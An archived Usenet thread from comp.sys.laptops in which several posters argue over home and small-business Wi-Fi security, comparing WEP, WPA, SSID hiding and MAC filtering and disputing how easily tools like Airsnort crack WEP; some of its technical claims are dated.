Archived from groups: comp.sys.laptops (
More info?)
Angry American wrote:
> I am aware of this all. I use a couple of simple programs to demonstrate
> to my customers how easy and vulnerable there networks are when they use
> wireless with the "default" settings.
Since the default settings typically have no security enabled, one would not
expect them to be secure. So what?
> I administer several local businesss
> as well as 4 local libraries and more home users than I can count. Using a
> program such as Cain and Abel will crack WEP in a matter of seconds as
> long as I can find the SSID.
From the "Cain & Abel v2.5 FAQ": "Can Cain crack WEP encryption ?
Not yet. WEP cracking requires a wireless card working in "monitor mode". In
this mode the card can capture packets at the 802.11 layer where some
required parameters reside. Not all adapters support "monitor mode" but
some of them does: cards based on Prism/2 chipset, some Cisco Aironet and
some Orinoco based cards can be put into monitor mode. Prism/2 adapters for
example use proprietary OIDs for vendor specific operations like
OID_CW10_CMD (0xFF010183h) which is used to send commands to the card. I
really need more informations on specific hardware in order to directly
control a wireless card for WEP cracking.
If you want to see Cain cracking WEP encryption just help me !"
In other words, it can't crack WEP in seconds or minutes or hours or days or
years or millennia because it wasn't made with that capability.
You picked the wrong tool. To crack WEP you need Airsnort or WEPcrack, both
of which need to collect about ten million packets and rely on weak frames,
which the WEP-Plus protocol which went into general use about two years ago
substantially eliminates.
Given enough weak frames, Airsnort or WEPcrack can indeed crack WEP in a few
seconds. But that assumes that you have first gathered the necessary
number of frames.
You clearly haven't actually _tried_ this if you think it's that easy.
> If I do not have the broadcast name, then it
> does take longer, but its still possible. A brute force attack against WPA
> can work, but it would take one hell of a machine to generate the crack.
Can you crack it in the five minutes you have available to you before the
key changes?
> IMHO it takes a lot less then the Government and the toys they have to
> crack a wireless network. There are too many tools available for free on
> the web that would make it pretty easy for any script kiddie with half a
> brain to breakin.
The fact that there are tools available for free does not mean that those
tools work on a properly configured network.
The difficulty with WPA is that it is possible to misconfigure it in such a
way that it becomes vulnerable. Use a long random passphrase or RADIUS
and it becomes quite difficult to penetrate. If it's misconfigured then
you can grab a few packets and then throw a dictionary at it. That doesn't
work if it's configured with a non-dictionary password and with RADIUS it
morphs the key regularly so that you only have five minutes or so from
start of sniffing in which to crack the key.
> I do not have any customers as of yet that have "critical or sensative"
> data. But if I did, I would recomend that they stay away from wireless all
> together, or at least go with a company like Cisco and the Airnet
> technology that they use to further encrypt data.
What technology is that? Aironet doesn't do anything different from any
other standards-compliant implementation.
> I am no stranger to wireless, I just wish more people were aware of the
> vulnerabilites and risks associated.
Maybe you're no stranger to wireless, but given what you've said about the
subject you clearly _are_ a stranger to _cracking_ wireless.
>
> Dan
>
> J. Clarke wrote:
>> Angry American wrote:
>>
>>> Turning off SSID makes it harder to determine if you have a wireless
>>> network. All SSID is is the router advertising itself. This would be
>>> step one of keeping people out of your wirelass LAN, what they dont
>>> know is there, they cant hack. WPA is more secure than WEP, you have
>>> to basically attack a system runing WPA with an alogorythm, and this
>>> takes time. WPA uses a 128bit string, with some routers using a
>>> 256bit string. WEP on the other hand has no sucj encryption and only
>>> takes a few seconds to crack.
>>
>> First, you need an algorithm to attack either. You do understand
>> what an "algorithm" is do you not? 'cout << "hello world";' is an
>> algorithm. Not a very interesting one, but an algorithm nonetheless.
>> The algorithm to attack WEP is well known, if one to attack WAP has
>> been published I'm not aware of it.
>>
>> Second, WEP and WPA use the same encryption. What's different about
>> WPA is the regular key change.
>>
>> Third, perhaps you might want to try cracking WEP on a brand new
>> router that someone else set up with 128 bit encryption and see how
>> long it takes. The WEP crack requires the collection of a large
>> number of "weak frames", a hole that was if not closed at least
>> patched quite a long time ago by adding checks for weak frames that
>> eliminate the transmission of most of them. You could be weeks or
>> months gathering enough weak frames to actually perform the crack.
>> With WPA there will be a key change before you've gathered enough
>> weak frames to perform the crack.
>>
>>> MAC filtering is just another step in the arsenal of keeping people
>>> from snooping your network. Using the three steps, along with
>>> changing your default network name (ie Linksys) to something else,
>>> and changing the default password will keep most people out of your
>>> network.
>>
>> Actually, just using WPA will keep just about anybody but possibly
>> government agencies out of your network, and them only if they want
>> in bad enough to turn their supercomputer arrays loose on the
>> problem, unlikely given that they have the authority to just walk in
>> and take all your hardware.
>>
>> The problem is that WPA has to be supported at both ends, which may be
>> problematical with some built-in network interfaces in laptops.
>>
>>> Dan
>>>
>>> William P.N. Smith wrote:
>>>> "Angry American" <angryamerican@nospamdooleyism.com> wrote:
>>>>> Not to mention WEP is almost no security what so ever. Use WPA
>>>>> instead, with MAC filtering, and turn off your SSDI broadcast.
>>>>
>>>> Uh, not exactly. WPA is just WEP with key change every 5 minutes or
>>>> so. MAC filtering only locks out people who can't do MAC spoofing,
>>>> which is pretty trivial, and turning off SSID broadcast does nothing
>>>> for you at all, and in fact breaks Windows WZC.
--
--John
Reply to jclarke at ae tee tee global dot net
(was jclarke at eye bee em dot net)
Facebook
Twitter